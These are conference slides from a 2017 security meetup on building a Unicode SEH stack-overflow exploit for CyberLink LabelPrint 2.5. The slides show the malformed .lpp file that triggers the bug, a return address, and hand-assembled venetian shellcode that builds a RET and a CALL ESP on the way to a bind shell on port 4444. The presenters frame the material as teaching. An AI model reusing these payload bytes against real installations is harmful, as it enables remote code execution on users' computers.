Exploit Development: CyberLink LabelPrint 2.5 Unicode Stack Overflow
IT Audit & IT Security Meetup #4 - Sharing in the Cloud
Indonesian Cloud, Jakarta, 13 October 2017
Who?
• Thomas Gregory - @modpr0be
  • IT Security consultant @Spentera
  • Security researcher (occasionally)
  • Focus on Windows exploitation
  • IT Security trainer (sometimes)
• f3ci - ????
  • Security researcher
  • Penetration tester, red team
  • Appsec & simple exploit dev
What?
• CyberLink LabelPrint 2.5
  • Labeling software
  • Embedded by default in the CyberLink Power2Go installation.
  • Included as bloatware in all Lenovo, HP and Asus laptops somewhere between 2015 and 2016.
Why?
• The exploit development is quite challenging and interesting.
• We want to share it for education purposes only.
Let’s Begin
THE FUZZ
Fuzzing possibility
• File input
  • import
  • open media
  • open project
• Registry overflow
Tools
• Immunity Debugger with the mona plugin
• Editor/IDE (/me using Sublime Text)
LabelPrint Project
• Project file with extension .lpp
• Header:
<PROJECT version="1.0.00">
<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">
<TRACK name="" />
The Bug
• In the name parameter, inside the TRACK tag:
<PROJECT version="1.0.00">
<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">
<TRACK
name="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA" />
</INFORMATION>
</PROJECT>
SEH Overwritten
• The SE Handler is overwritten.
Unicode Based
• AA (0x4141) becomes .A.A (0x00410041): every input byte is widened with a 0x00 after the Unicode conversion.
What is SEH?
• A piece of code that is written inside an application, with the purpose of dealing with the fact that the application throws an exception (taken from corelan).
• An exception is an event, which occurs during the execution of a program, that disrupts the normal flow of the program's instructions.
• A catcher, who is trying to catch unusual behavior.
What is SEH?
This structure (also called a SEH record) is 8 bytes and has 2 elements of 4 bytes each:
• a pointer to the next exception registration structure (in essence, to the next SEH record, in case the current handler is unable to handle the exception)
• a pointer to the address of the actual code of the exception handler (SE Handler)
Abusing SEH
In other words, the payload must do the following things:
• Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won't kick in.
• Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode).
• Overwrite the SE handler with a pointer to an instruction that will bring you back to the next SEH and execute the jumpcode.
• The shellcode should be directly after the overwritten SE Handler. Some small jumpcode contained in the overwritten "pointer to next SEH record" will jump to it.
Abusing SEH
• When the exception occurs, the stack looks like this:
  [Diagram: the top of the stack holds our pointer to the next SEH address]
• Possible values to overwrite the SE Handler with are POP something, POP something, RETN to the stack.
• It will POP the address that sits at the top of the stack, POP again to take the second address, and RETN to execute the third address (which is now at the top of the stack).
• The third address is usually in our supplied input buffer.
Abusing SEH
Image taken from http://corelan.be with permission from Peter Van Eeckhoutte (Corelan).
Unicode?
• Unicode allows us to visually represent and/or manipulate text in most of the systems across the world in a consistent manner.
• Unicode based exploits are usually involved in:
  • file/folder naming
  • the part of an input parameter that deals with naming
More Info
• Structured Exception Handler (SEH)
  • https://msdn.microsoft.com/en-us/library/windows/desktop/ms680657(v=vs.85).aspx
  • https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
  • https://blog.spentera.com/2011/09/14/seh-based-stack-overflow-the-basic/
• Unicode based exploit
  • https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
SEH + Unicode = Venetian
PROBABLY THE MOST HATED COMBINATION
Venetian Shellcode
• One of the registers must point at the beginning of the shellcode.
• One register must point at a memory location that is writeable (and where it's ok to write the new reassembled shellcode).
• Normal venetian prepend shellcode:
  • Push another register to the stack (ESP)
  • Pop the stack (ESP) into EAX
  • Align the EAX register with add/sub instructions
  • Push the EAX register onto the stack (ESP)
  • RET (return to the beginning of the shellcode at EAX)
• Sadly, we won't face a normal venetian approach.
Typical Venetian Unicode Prepend Opcode (flow)
1. Align EAX register: if we use EAX as BufferRegister, we need to align EAX to point to our buffer.
2. "Stack walking": walk over the Next SEH and SEH.
3. RET to shellcode: shellcode executed.
Typical Venetian Unicode Prepend Opcode

ven = "\x56"          #push esi
ven += "\x41"         #align
ven += "\x58"         #pop eax
ven += "\x41"         #align
ven += "\x05\x04\x01" #add eax,01000400
ven += "\x41"         #align
ven += "\x2d\x01\x01" #sub eax,01000100
ven += "\x41"         #align
ven += "\x50"         #push eax
ven += "\x41"         #align
ven += "\xc3"         #ret

The add/sub values depend on where our buffer is; EAX is used as the BufferRegister.
Problem?
• Limited instructions (because of Unicode)
• Need to find a POP POP RET that is Unicode friendly
• All hex values between 0x80 and 0xFF are marked as bad
• Yes, the RET opcode (C3) is also included in the bad character list.
• Meanwhile, our venetian shellcode needs RET
• Typical Venetian: Sh*t!
Solution
• Find a proper Unicode friendly PPR (pop pop ret) instruction address somewhere in the library or executable
• Create "our version" of RET
• Fill the stack (ESP) with our shellcode
• Point our RET to a CALL ESP instruction address
  • This will alter the flow of execution.
• EAX must be pointing to the beginning of our shellcode.
• "Stack walk" until we meet the shellcode.
Our Venetian Unicode Shellcode (flow)
1. Align EAX register
2. Calculate where RET will be placed
3. Construct RET in EAX
4. Calculate EAX for the CALL ESP opcode
5. Reaching RET, execute CALL ESP
6. Re-align EAX
7. "Stack walk" to shellcode
8. Bind shell 4444
pop pop ret
• !mona seh
• Fortunately, we found one address that is Unicode friendly (0x0044002c) in the main program (LabelPrint.exe).
Construct RET (1)
• Calculate the value of the EAX register, preparing the address where we exactly want the decoded RET to be placed later in the stack.
• Limited calculation (because of Unicode)
• Zero the EAX register first:
  • xor eax,eax
Construct RET (2)
Preparing the address to push our RET:
• push esp
• pop eax
• and EAX register with 01001B00
• and EAX register with 01000100
• push EAX
• pop ESP

ven += "\x42"         #nop
ven += "\x54"         #push esp
ven += "\x42"         #nop
ven += "\x58"         #pop eax
ven += "\x42"         #nop
ven += "\x05\x1B\x01" #add eax,01001B00
ven += "\x42"         #nop
ven += "\x2d\x01\x01" #sub eax,01000100
ven += "\x42"         #nop
ven += "\x50"         #push eax
ven += "\x42"         #nop
ven += "\x5c"         #pop esp
Construct RET (3)
• After the calculation in EAX, the stack (ESP) will now point at 0x0012F655 (the same value as EAX).
• This is important for our RET decoding address later.
Construct RET (4) - Zeroing Out EAX
• We need to clear the EAX register for the next calculation of the RET opcode.
• After EAX is zeroed out we can calculate the EAX register to reach 0xC300C300 (RET opcode).
• We can perform the calculation with the AND operation:
  • AND EAX register with 7e007e00
  • AND EAX register with 01000100
Zeroing Out EAX

ven += "\x42"         #nop
ven += "\x25\x7e\x7e" #and eax,7e007e00
ven += "\x42"         #nop
ven += "\x25\x01\x01" #and eax,01000100
Construct RET (5)
Preparing the RET opcode:
• Zeroing out EAX first (done)
• XOR EAX register with 7f007f00
• ADD EAX register with 44004400
• PUSH EDI
• PUSH EAX
The RET Opcode (1)

ven += "\x35\x7f\x7f" #xor eax,7f007f00
ven += "\x42"         #nop
ven += "\x05\x44\x44" #add eax,44004400
ven += "\x42"         #nop
ven += "\x57"         #push edi/padding
ven += "\x42"         #nop
ven += "\x50"         #push eax
The RET Opcode (2)
Construct CALL to ESP (1)
Construct CALL to ESP (2)
Construct CALL to ESP (3)
Stack Walk to Shellcode
Our Venetian Shellcode

ven += "\x58"         #pop eax
ven += "\x42"         #nop
ven += "\x58"         #pop eax
ven += "\x42"         #nop
ven += "\x05\x10\x01" #add eax,01001000, align eax to our buffer
ven += "\x42"         #nop
ven += "\x2d\x0e\x01" #sub eax,01000E00, align eax to our buffer
ven += "\x42"         #nop
ven += "\x50"         #push eax
ven += "\x42"         #nop
ven += "\x5C"         #pop esp
ven += "\x42"         #nop
ven += "\x58"         #pop eax
ven += "\x42"         #nop
ven += "\x05\x53\x7c" #add eax,7c005300, part of call esp
ven += "\x42"         #nop
ven += "\x50"         #push eax
ven += "\x42" * 68    #padding to fill the stack
ven += "\x7b\x32"     #part of call esp
Final Exploit
https://www.exploit-db.com/exploits/42777/
Solution
• For now, do not use CyberLink LabelPrint.
Thank you
research@spentera.id
